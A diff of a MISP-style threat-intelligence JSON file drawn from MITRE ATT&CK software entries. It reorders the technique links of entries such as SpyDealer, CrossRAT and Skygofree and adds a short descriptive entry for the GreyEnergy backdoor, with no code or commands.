"tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "6c49d50f-494d-4150-b774-a655022d20a6", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "702055ac-4e54-4ae9-9527-e23a38e0b160", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "d4536441-1bcc-49fa-80ae-a596ed3f7ffd", "tags": [ 
@@ -18677,17 +20927,219 @@ ], "type": "uses" }, + { + "dest-uuid": "bd4d32f5-eed4-4018-a649-40b229dd1d69", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "6c49d50f-494d-4150-b774-a655022d20a6", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "4e6620ac-c30c-4f6d-918e-fa20cae7c1ce", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "2204c371-6100-4ae0-82f3-25c07c29772a", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "351c0927-2fc1-4a2c-ad84-cbbee7eb8172", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, { "dest-uuid": "c5089859-b21f-40a3-8be4-63e381b8b1c0", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" + }, + { + "dest-uuid": "702055ac-4e54-4ae9-9527-e23a38e0b160", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "6683aa0c-d98a-4f5b-ac57-ca7e9934a760", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "99e6295e-741b-4857-b6e5-64989eb039b4", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "79eec66a-9bd0-4a3f-ac82-19159e94bd44", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "b3c2e5de-0941-4b57-ba61-af029eb5517a", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" } ], "uuid": "86fc6f0c-86d9-473e-89f3-f50f3cb9319b", "value": "SpyDealer - S0324" }, + { + "description": "[GreyEnergy](https://attack.mitre.org/software/S0342) is 
a backdoor written in C and compiled in Visual Studio. [GreyEnergy](https://attack.mitre.org/software/S0342) shares similarities with the [BlackEnergy](https://attack.mitre.org/software/S0089) malware and is thought to be the successor of it.(Citation: ESET GreyEnergy Oct 2018)", + "meta": { + "external_id": "S0342", + "mitre_platforms": [ + "Windows" + ], + "refs": [ + "https://attack.mitre.org/software/S0342", + "https://www.welivesecurity.com/wp-content/uploads/2018/10/ESET_GreyEnergy.pdf" + ], + "synonyms": [ + "GreyEnergy" + ] + }, + "related": [ + { + "dest-uuid": "355be19c-ffc9-46d5-8d50-d6a036c675b6", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "62dfd1ca-52d5-483c-a84b-d6e80bf94b7b", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "43e7dc91-05b2-474c-b9ac-2ed4fe101f4d", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "7d751199-05fa-4a72-920f-85df4506c76c", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "6ff403bc-93e3-48be-8687-e102fdba8c88", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "bb5a00de-e086-4859-a231-fa793f6797e2", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "4b74a1d4-b0e9-4ef1-93f1-14ecc6e2f5b5", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "322bad5a-1c49-4d23-ab79-76d641794afa", + "tags": [ + 
"estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "56fca983-1cf1-4fd1-bda0-5e170a37ab59", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "0a3ead4e-6d47-4ccb-854c-a6a4f9d96b22", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "1b84d551-6de8-4b96-9930-d177677c3b1d", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "62b8c999-dcc0-4755-bd69-09442d9359f5", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "57340c81-c025-4189-8fa0-fc7ede51bae4", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + } + ], + "uuid": "308b3d68-a084-4dfb-885a-3125e1a9c1e8", + "value": "GreyEnergy - S0342" + }, { "description": "[CrossRAT](https://attack.mitre.org/software/S0235) is a cross platform RAT.", "meta": { @@ -18706,13 +21158,6 @@ ] }, "related": [ - { - "dest-uuid": "dd901512-6e37-4155-943b-453e3777b125", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "7bc57495-ea59-4380-be31-a64af124ef18", "tags": [ @@ -18721,7 +21166,7 @@ "type": "uses" }, { - "dest-uuid": "0259baeb-9f63-4c69-bf10-eb038c390688", + "dest-uuid": "dd901512-6e37-4155-943b-453e3777b125", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], 
@@ -18733,6 +21178,13 @@ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" + }, + { + "dest-uuid": "0259baeb-9f63-4c69-bf10-eb038c390688", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" } ], "uuid": "a5e91d50-24fa-44ec-9894-39a88f658cea", @@ -18755,21 +21207,7 @@ }, "related": [ { - "dest-uuid": "2e0dd10b-676d-4964-acd0-8a404c92b044", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "799ace7f-e227-4411-baa0-8868704f2a69", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "9422fc14-1c43-410d-ab0f-a709b76c72dc", + "dest-uuid": "b9f5dbe2-4c55-4fc5-af2e-d42c1d182ec4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -18782,20 +21220,6 @@ ], "type": "uses" }, - { - "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "b9f5dbe2-4c55-4fc5-af2e-d42c1d182ec4", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "56fca983-1cf1-4fd1-bda0-5e170a37ab59", "tags": [ 
@@ -18816,6 +21240,34 @@ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" + }, + { + "dest-uuid": "9422fc14-1c43-410d-ab0f-a709b76c72dc", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "2e0dd10b-676d-4964-acd0-8a404c92b044", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "799ace7f-e227-4411-baa0-8868704f2a69", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" } ], "uuid": "60d50676-459a-47dd-92e9-a827a9fe9c58", @@ -18838,14 +21290,14 @@ }, "related": [ { - "dest-uuid": "f981d199-2720-467e-9dc9-eea04dbe05cf", + "dest-uuid": "6c49d50f-494d-4150-b774-a655022d20a6", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "6c49d50f-494d-4150-b774-a655022d20a6", + "dest-uuid": "f981d199-2720-467e-9dc9-eea04dbe05cf", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -18871,13 +21323,6 @@ ] }, "related": [ - { - "dest-uuid": "57340c81-c025-4189-8fa0-fc7ede51bae4", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "56fca983-1cf1-4fd1-bda0-5e170a37ab59", "tags": [ 
@@ -18885,97 +21330,6 @@ ], "type": "uses" }, - { - "dest-uuid": "731f4f55-b6d0-41d1-a7a9-072a66389aea", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "8c32eb4d-805f-4fc5-bf60-c4d476c131b5", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "f879d51c-5476-431c-aedf-f14d207e4d1e", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "62dfd1ca-52d5-483c-a84b-d6e80bf94b7b", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "f72eb8a8-cd4c-461d-a814-3f862befbf00", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "c848fcf7-6b62-4bde-8216-b6c157d48da0", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "3ccef7ae-cb5e-48f6-8302-897105fbf55c", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "478aa214-2ca7-4ec0-9978-18798e514790", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "7bc57495-ea59-4380-be31-a64af124ef18", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "7fd87010-3a00-4da3-b905-410525e8ec44", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - 
"type": "uses" - }, - { - "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1", "tags": [ 
@@ -18983,12 +21337,110 @@
 ],
 "type": "uses"
 },
+ {
+ "dest-uuid": "731f4f55-b6d0-41d1-a7a9-072a66389aea",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "f879d51c-5476-431c-aedf-f14d207e4d1e",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "8c32eb4d-805f-4fc5-bf60-c4d476c131b5",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "7fd87010-3a00-4da3-b905-410525e8ec44",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
 {
 "dest-uuid": "2e0dd10b-676d-4964-acd0-8a404c92b044",
 "tags": [
 "estimative-language:likelihood-probability=\"almost-certain\""
 ],
 "type": "uses"
+ },
+ {
+ "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "f72eb8a8-cd4c-461d-a814-3f862befbf00",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "7bc57495-ea59-4380-be31-a64af124ef18",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "57340c81-c025-4189-8fa0-fc7ede51bae4",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "c848fcf7-6b62-4bde-8216-b6c157d48da0",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "478aa214-2ca7-4ec0-9978-18798e514790",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "62dfd1ca-52d5-483c-a84b-d6e80bf94b7b",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "3ccef7ae-cb5e-48f6-8302-897105fbf55c",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
 }
 ],
 "uuid": "7ba0fc46-197d-466d-8b9f-f1c64d5d81e5",
@@ -19011,21 +21463,7 @@
 },
 "related": [
 {
- "dest-uuid": "6683aa0c-d98a-4f5b-ac57-ca7e9934a760",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
- {
- "dest-uuid": "53263a67-075e-48fa-974b-91c5b5445db7",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
- {
- "dest-uuid": "d4536441-1bcc-49fa-80ae-a596ed3f7ffd",
+ "dest-uuid": "8f0e39c6-82c9-41ec-9f93-5696c0f2e274",
 "tags": [
 "estimative-language:likelihood-probability=\"almost-certain\""
 ],
@@ -19038,6 +21476,13 @@
 ],
 "type": "uses"
 },
+ {
+ "dest-uuid": "d4536441-1bcc-49fa-80ae-a596ed3f7ffd",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
 {
 "dest-uuid": "89fcd02f-62dc-40b9-a54b-9ac4b1baef05",
 "tags": [
@@ -19060,7 +21505,14 @@
 "type": "uses"
 },
 {
- "dest-uuid": "8f0e39c6-82c9-41ec-9f93-5696c0f2e274",
+ "dest-uuid": "53263a67-075e-48fa-974b-91c5b5445db7",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "6683aa0c-d98a-4f5b-ac57-ca7e9934a760",
 "tags": [
 "estimative-language:likelihood-probability=\"almost-certain\""
 ],
@@ -19087,42 +21539,7 @@
 },
 "related": [
 {
- "dest-uuid": "62b8c999-dcc0-4755-bd69-09442d9359f5",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
- {
- "dest-uuid": "7e150503-88e7-4861-866b-ff1ac82c4475",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
- {
- "dest-uuid": "b6075259-dba3-44e9-87c7-e954f37ec0d5",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
- {
- "dest-uuid": "f24faf46-3b26-4dbb-98f2-63460498e433",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
- {
- "dest-uuid": "42e8de7b-37b2-4258-905a-6897815e58e0",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
- {
- "dest-uuid": "322bad5a-1c49-4d23-ab79-76d641794afa",
+ "dest-uuid": "707399d6-ab3e-4963-9315-d9d3818cd6a0",
 "tags": [
 "estimative-language:likelihood-probability=\"almost-certain\""
 ],
@@ -19135,48 +21552,6 @@
 ],
 "type": "uses"
 },
- {
- "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
- {
- "dest-uuid": "3ccef7ae-cb5e-48f6-8302-897105fbf55c",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
- {
- "dest-uuid": "707399d6-ab3e-4963-9315-d9d3818cd6a0",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
- {
- "dest-uuid": "8f4a33ec-8b1f-4b80-a2f6-642b2e479580",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
- {
- "dest-uuid": "e358d692-23c0-4a31-9eb6-ecc13a8d7735",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
- {
- "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
 {
 "dest-uuid": "519630c5-f03f-4882-825c-3af924935817",
 "tags": [
@@ -19185,21 +21560,7 @@
 "type": "uses"
 },
 {
- "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
- {
- "dest-uuid": "3489cfc5-640f-4bb3-a103-9137b97de79f",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
- {
- "dest-uuid": "7bc57495-ea59-4380-be31-a64af124ef18",
+ "dest-uuid": "42e8de7b-37b2-4258-905a-6897815e58e0",
 "tags": [
 "estimative-language:likelihood-probability=\"almost-certain\""
 ],
@@ -19213,7 +21574,49 @@
 "type": "uses"
 },
 {
- "dest-uuid": "03d7999c-1f4c-42cc-8373-e7690d318104",
+ "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "e358d692-23c0-4a31-9eb6-ecc13a8d7735",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "7e150503-88e7-4861-866b-ff1ac82c4475",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "8f4a33ec-8b1f-4b80-a2f6-642b2e479580",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "b6075259-dba3-44e9-87c7-e954f37ec0d5",
 "tags": [
 "estimative-language:likelihood-probability=\"almost-certain\""
 ],
@@ -19226,12 +21629,61 @@
 ],
 "type": "uses"
 },
+ {
+ "dest-uuid": "3489cfc5-640f-4bb3-a103-9137b97de79f",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "3ccef7ae-cb5e-48f6-8302-897105fbf55c",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "03d7999c-1f4c-42cc-8373-e7690d318104",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "7bc57495-ea59-4380-be31-a64af124ef18",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
 {
 "dest-uuid": "ffe742ed-9100-4686-9e00-c331da544787",
 "tags": [
 "estimative-language:likelihood-probability=\"almost-certain\""
 ],
 "type": "uses"
+ },
+ {
+ "dest-uuid": "62b8c999-dcc0-4755-bd69-09442d9359f5",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "f24faf46-3b26-4dbb-98f2-63460498e433",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "322bad5a-1c49-4d23-ab79-76d641794afa",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
 }
 ],
 "uuid": "c2417bab-3189-4d4d-9d60-96de2cdaf0ab",
@@ -19254,7 +21706,7 @@
 },
 "related": [
 {
- "dest-uuid": "f3c544dc-673c-4ef3-accb-53229f1ae077",
+ "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830",
 "tags": [
 "estimative-language:likelihood-probability=\"almost-certain\""
 ],
@@ -19268,7 +21720,35 @@
 "type": "uses"
 },
 {
- "dest-uuid": "c848fcf7-6b62-4bde-8216-b6c157d48da0",
+ "dest-uuid": "355be19c-ffc9-46d5-8d50-d6a036c675b6",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "00d0b012-8a03-410e-95de-5826bf542de6",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "1b7ba276-eedc-4951-a762-0ceea2c030ec",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "35dd844a-b219-4e2b-a6bb-efa9a75995a9",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "01a5a209-b94c-450b-b7f9-946497d91055",
 "tags": [
 "estimative-language:likelihood-probability=\"almost-certain\""
 ],
@@ -19289,63 +21769,7 @@
 "type": "uses"
 },
 {
- "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
- {
- "dest-uuid": "35dd844a-b219-4e2b-a6bb-efa9a75995a9",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
- {
- "dest-uuid": "7e150503-88e7-4861-866b-ff1ac82c4475",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
- {
- "dest-uuid": "707399d6-ab3e-4963-9315-d9d3818cd6a0",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
- {
- "dest-uuid": "01a5a209-b94c-450b-b7f9-946497d91055",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
- {
- "dest-uuid": "8f4a33ec-8b1f-4b80-a2f6-642b2e479580",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
- {
- "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
- {
- "dest-uuid": "7bc57495-ea59-4380-be31-a64af124ef18",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
- {
- "dest-uuid": "1b7ba276-eedc-4951-a762-0ceea2c030ec",
+ "dest-uuid": "c848fcf7-6b62-4bde-8216-b6c157d48da0",
 "tags": [
 "estimative-language:likelihood-probability=\"almost-certain\""
 ],
@@ -19359,14 +21783,35 @@
 "type": "uses"
 },
 {
- "dest-uuid": "00d0b012-8a03-410e-95de-5826bf542de6",
+ "dest-uuid": "8f4a33ec-8b1f-4b80-a2f6-642b2e479580",
 "tags": [
 "estimative-language:likelihood-probability=\"almost-certain\""
 ],
 "type": "uses"
 },
 {
- "dest-uuid": "355be19c-ffc9-46d5-8d50-d6a036c675b6",
+ "dest-uuid": "707399d6-ab3e-4963-9315-d9d3818cd6a0",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "7bc57495-ea59-4380-be31-a64af124ef18",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "f3c544dc-673c-4ef3-accb-53229f1ae077",
 "tags": [
 "estimative-language:likelihood-probability=\"almost-certain\""
 ],
@@ -19378,6 +21823,20 @@
 "estimative-language:likelihood-probability=\"almost-certain\""
 ],
 "type": "uses"
+ },
+ {
+ "dest-uuid": "7e150503-88e7-4861-866b-ff1ac82c4475",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "82caa33e-d11a-433a-94ea-9b5a5fbef81d",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
 }
 ],
 "uuid": "1d1fce2f-0db5-402b-9843-4278a0694637",
@@ -19399,13 +21858,6 @@
 ]
 },
 "related": [
- {
- "dest-uuid": "731f4f55-b6d0-41d1-a7a9-072a66389aea",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
 {
 "dest-uuid": "43e7dc91-05b2-474c-b9ac-2ed4fe101f4d",
 "tags": [
@@ -19420,6 +21872,13 @@
 ],
 "type": "uses"
 },
+ {
+ "dest-uuid": "731f4f55-b6d0-41d1-a7a9-072a66389aea",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
 {
 "dest-uuid": "8f4a33ec-8b1f-4b80-a2f6-642b2e479580",
 "tags": [
@@ -19455,14 +21914,7 @@
 },
 "related": [
 {
- "dest-uuid": "6c49d50f-494d-4150-b774-a655022d20a6",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
- {
- "dest-uuid": "6683aa0c-d98a-4f5b-ac57-ca7e9934a760",
+ "dest-uuid": "b3c2e5de-0941-4b57-ba61-af029eb5517a",
 "tags": [
 "estimative-language:likelihood-probability=\"almost-certain\""
 ],
@@ -19475,6 +21927,13 @@
 ],
 "type": "uses"
 },
+ {
+ "dest-uuid": "702055ac-4e54-4ae9-9527-e23a38e0b160",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
 {
 "dest-uuid": "6a3f6490-9c44-40de-b059-e5940f246673",
 "tags": [
@@ -19483,14 +21942,14 @@
 "type": "uses"
 },
 {
- "dest-uuid": "b3c2e5de-0941-4b57-ba61-af029eb5517a",
+ "dest-uuid": "6683aa0c-d98a-4f5b-ac57-ca7e9934a760",
 "tags": [
 "estimative-language:likelihood-probability=\"almost-certain\""
 ],
 "type": "uses"
 },
 {
- "dest-uuid": "702055ac-4e54-4ae9-9527-e23a38e0b160",
+ "dest-uuid": "6c49d50f-494d-4150-b774-a655022d20a6",
 "tags": [
 "estimative-language:likelihood-probability=\"almost-certain\""
 ],
@@ -19501,31 +21960,35 @@
 "value": "Skygofree - S0327"
 },
 {
- "description": "[jRAT](https://attack.mitre.org/software/S0283) is a cross-platform remote access tool that was first observed in November 2017. (Citation: jRAT Symantec Aug 2018)",
